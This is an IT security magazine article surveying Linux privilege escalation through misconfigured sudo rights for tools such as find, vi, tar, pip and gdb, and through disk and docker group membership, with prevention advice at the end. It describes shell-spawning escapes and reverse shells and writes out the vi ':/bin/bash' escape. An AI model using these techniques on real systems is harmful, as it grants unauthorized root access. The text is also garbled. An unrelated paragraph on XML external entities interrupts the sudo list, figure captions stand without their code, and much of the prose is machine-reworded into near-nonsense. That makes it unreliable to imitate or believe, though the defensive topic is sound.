Linux Privilege Escalation From Misconfiguration by Anand M

INTRODUCTION

History: Computer systems are designed for the use of multiple activities and multiple users. Privileges mean what a user is permitted to do on the system. Privileges include read and write files, execute, or modifying system files. Privilege escalation means a user receives privileges they are not entitled to do. These privileges can be used to delete files, view private information, install unwanted programs such as viruses, Trojan, malware, etc. When a system has a bug that allows security to be bypassed, alternatively, it has flawed design assumptions about how it will be used to leverage the access to gain major root access.

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system and software and misconfigurations to gain elevated access to resources that are normally protected from an application side or end user. An application with more privileges than intended by the application developer and system administrator can perform unauthorized actions.

While associations are factually liable to have more Windows customers, Linux benefit acceleration assaults are critical dangers to represent while considering an association’s data security act. Look at that as an association’s most basic foundation, for example, web servers, databases, firewalls, and so forth, are likely running a Linux working framework. Bargains to these basic gadgets can possibly extremely upset an association’s activities, if not crush them completely. Besides, the Internet of Things (IoT) and implanted frameworks are getting to be universal in the working environment, in this manner expanding the quantity of potential focuses for vindictive programmers. Given the commonness of Linux gadgets in the working environment, it is of foremost significance that associations solidify and secure these devices.

What is Privilege escalation?

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to the system.

What is SUDO?

Sudo (su “do”) allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.

Sudoers file

The Sudoers file contains the user and the corresponding program to be executed as SUDO privilege. The file is located in /etc/sudoers. The editing for the sudoer’s file needs elevated privileges.

SUDOER’S FILE

CHECKING SUDO commands for a user

Several commands run as SUDO will lead to privilege escalation of the system. Below are some of the commands being run as SUDO that are exploited for privilege escalation.

npm:

npm is a package manager for the JavaScript programming language. It is the default package manager for the JavaScript runtime environment Node.js. A malicious package, Son, is created which contains prerequisite script to run. The npm command is run with “–unsafe-perm”

pip:

Pip (Python package installer) is used to install Python packages as several packages are required to be installed with elevated privileges. This can be exploited with malicious Python package or setup.py script.

Malicious setup.py

Executing PIP

Listener for reverse shell

FIND.

Find command is used to find files. Find command run as sudo can be exploited with -exec argument.

Mount:

Mount command is used to mount drives. Mount command run as sudo can be used to spawn shell and escalate the privilege.

man:

The Man command is used for viewing manual pages for a command. Running a man command using SUDO can be exploited and a shell can be spawned.

AWK:

AWK is a programming language designed for text processing and typically used as a data extraction and reporting tool. AWK run on SUDO can be exploited as below.

NMAP:

Nmap is program used for scanning ports and services. NMAP run as sudo can be exploited with lua online script and saved as .nse.

WGET:

Wget is a command used to download files. Get running on SUDO can be exploited as follows.

Also, Wget can be used to replace file with -O argument.

GDB:

GDB (Gnu Debugger) is a command used to debug applications. DB run with SUDO can be exploited as follows.

So far, the third type of entities has been most frequently attacked (except for DoS): using various files of a file system as a source of an external entity, it was possible (not always) to read files of the file system via data output in XML or error output. Besides it was possible to conduct DoS attacks, brute force the content of a parsed entity, read files via a Document Type Declaration (DTD), which if error output was enabled allowed displaying the content of the read file.

XML 1.0 standard defines the structure of an XML document. The standard defines a concept referred to as an entity, which is a storage unit of some type.

There are different types of entities, but the one we’re focusing on is externally referenced. External entities are valuable to attackers because they can access local or remote content via declared system identifiers which are a more critical attack on the web application.

Vi:

Vi is text editor.vi used as SUDO can be used to spawn shell and elevate privilege.

When vi is opened type “:/bin/bash”

FTP:

FTP command is used as FTP client to connect to FTP. FTP with sudo permission can be exploited as below.

Less:

Less command is used to view contents of a file.

Running with SUDO privileges can be exploited as below.

More:

More command is also similar to less command used to view the contents of the file. More command running with SUDO privileges can be used to spawn an elevated shell.

Tar:

If a user runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo. The payload executes and the user receives a reverse shell with root privileges.

Composer:

If a user ran an untrusted script (like composer Son with a malicious) with the root privilege, an attacker can use that as leverage to gain privilege escalation.

Privilege Escalation via Groups:

A Linux user will have a group. To view the groups in terminal type “getent group”.

Disks GROUP:

If a user is in disk group the user has access to read any block on the disk.

The user can use a tool like debugfs to mount root directory.

From then he has access to read and write to any files on the disk.

Disk mounted using debugfs

Reading file in /root directory

Docker Group:

If a user has access to the Docker daemon or the docker group an attacker can use that as leverage to gain privilege escalation.

Conclusion:

Privilege escalation can be done via misconfigured SUDO access and Group access. This exploration inspected a few Linux privilege escalation procedures that are in dynamic use as of the date of this distribution. While the Linux people group has made incredible advance in anchoring their frameworks, these endeavors show that basic vulnerabilities are as yet present in the Linux kernel, the working framework, and client level applications. A considerable lot of the privilege escalation strategies talked about will stay feasible for the not so distant, as they misuse basic capacities of the Linux working framework. This reality strengthens the significance of distinguishing, approving, and remediating Linux privilege escalation vulnerabilities. Linux frameworks, for example, creation servers, inserted gadgets, and cloud foundation are regularly basic prerequisites for an association to work. In the event that these gadgets are endangered, the security of the association is in question. Thusly, the creator urges Linux heads to take responsibility for the security of these gadgets and solidify them appropriately. Fundamentally, if heads remain current on patches, painstakingly reviews and privileged projects and clients, and takes after secure registering rehearses, they can significantly diminish their helplessness to privilege escalation assaults and at last upgrade their Linux security pose.

Preventions:

• This segment exhibited that wild cards can present critical vulnerabilities if inappropriately used. Luckily, these vulnerabilities are easy to remediate. In the first place, administrators ought to be perceptive of the dangers of conveying programmed contents and administrations that keep running as root. Where conceivable, administrators should adjust to the guideline of slightest privilege, rather depending on sudo privileges and gathering consents rather than cover utilization of the root account. Next, when really creating cron jobs, administrators should forgo utilizing wild cards, and rather be unequivocal in their affirmations. Alluding to the past precedent, administrators could have just excluded the wild card “*” and the content would have held all usefulness with none of the dangers.
• Legitimately relieving sudo mishandle requires cautious administration of sudo users and their authorizations. Administrators must guarantee that their sudo users use solid passwords, as aggressors will in all likelihood perform password cracking assaults against sudo users. Furthermore, administrators should screen sudo users for access to programs that contain parameters for subjective code execution. Alluding to the models above, administrators may consider utilizing Nano rather than Vi. In the event that a client needs read access to touchy documents, consider adding them to particular gatherings that have authorizations to peruse the record, instead of giving them cover sudo rights. At last, administrators must treat sudo users with a similar level of consideration and alert expected of the root account.
• Once the stock is finished, administrators ought to examine their SUID applications to decide whether they authentically require lifted permissions, and furthermore to check if the application contains parameters that can be manhandled. Administrators ought to be vigilant for SUID pairs that contain parameters for code execution, for example, ‘-e’ or ‘–exec’, or for parameters that compose discretionary information to the record framework. These parameters can regularly be found inside the manual pages of the particular application. Next, administrators ought to distinguish and amend world writeable SUID programs, as these can empower assailants to embed vindictive code into the special program’s execution. Lastly, administrators ought to analyze their apportioning plans as they identify with SUID parallels. For instance, administrators may consider parceling their drives so that ‘nosuid’ are set for client segments, as this will keep clients from acquainting unreliable SUID doubles with the record system. It is likewise significant that after aggressors effectively raise privileges, they frequently make extra backdoors for later use by checking command shells, content managers, and intelligent projects as SUID, and setting them in cloud areas of the document framework. Consistently evaluating and approving SUID parallels will alleviate SUID benefit acceleration assaults and can likewise help in recognizing and reacting to unapproved intrusions.

---

Reference:

1. 1. https://en.wikipedia.org/wiki/Privilege_escalation
   2. https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
   3. https://study.com/academy/lesson/what-is-privilege-escalation.html
   4. https://en.wikipedia.org/wiki/Sudo
   5. https://en.wikipedia.org/wiki/Chroot
   6. https://en.wikipedia.org/wiki/Principle_of_least_privilege        
      

---

About the Author:

Name: ANAND M

Email: anand@infysec.com

Company: https://www.infysec.com/                                                                         

 

The post Linux Privilege Escalation From Misconfiguration by Anand M appeared first on Hakin9 - IT Security Magazine.

from Hakin9 – IT Security Magazine https://ift.tt/2Iixi9b